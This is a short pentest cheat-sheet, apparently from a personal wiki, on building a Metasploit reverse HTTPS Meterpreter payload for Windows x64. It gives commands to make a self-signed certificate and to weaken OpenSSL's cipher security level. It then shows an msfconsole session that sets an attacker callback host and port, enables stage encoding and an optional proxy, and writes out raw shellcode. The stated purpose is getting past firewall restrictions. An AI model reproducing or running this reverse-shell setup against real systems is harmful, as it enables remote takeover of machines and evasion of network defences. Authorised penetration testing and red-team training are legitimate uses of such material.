HTTPs Meterpreter

Overview

HTTPs Meterpreter is a type of Meterpreter shell that uses HTTPs protocol for communication between the attacker and the target system. This type of shell is commonly used in situations where the attacker needs to bypass firewall or network restrictions that may prevent other types of shells, such as reverse TCP or bind TCP, from working properly.

Generating your own self signed certificate

To generate your own self signed certificate:

openssl req -new -x509 -nodes -out cert.crt -keyout priv.key

In order for the Metasploit to use the cert we will concatinate the private and public key to create us a .pem file

cat priv.key cert.crt > rfc.pem

We also must change the CipherString in the /etc/ssl/openssl.cnf config file or our reverse HTTPS shell will not work properly.

First, we will locate this line in the config file:

CipherString=DEFAULT@SECLEVEL=2

and change to to:

CipherString=DEFAULT

Finally, we can set it in our Metasploit instance:

set StagerVerifySSLCert true
set HandlerSSLCert /home/kali/self_cert/rfc.pem

Msfconsole generate payload

To generate a Meterpreter payload:

msf6 > use windows/x64/meterpreter/reverse_https
msf6 payload(windows/x64/meterpreter/reverse_https) > set LHOST tun0
LHOST => 192.168.45.5
msf6 payload(windows/x64/meterpreter/reverse_https) > set LPORT 443
LPORT => 443
msf6 payload(windows/x64/meterpreter/reverse_https) > set StagerVerifySSLCert true
StagerVerifySSLCert => true 
msf6 payload(windows/x64/meterpreter/reverse_https) > set HandlerSSLCert ../../payloads/SpaceX.pem
handlersslcert => ../../payloads/SpaceX.pem
msf6 exploit(multi/handler) > set EnableStageEncoding true
EnableStageEncoding => true

## optional proxy
msf6 exploit(multi/handler) > set HttpProxyHost 172.16.20.50
HttpProxyHost => 172.16.20.50
msf6 exploit(multi/handler) > set HttpProxyPort 8080
HttpProxyPort => 8080

msf6 payload(windows/x64/meterpreter/reverse_https) > generate -f raw -o spacex.bin

References

https://ppn.snovvcrash.rocks/pentest/c2/meterpreterppn.snovvcrash.rocks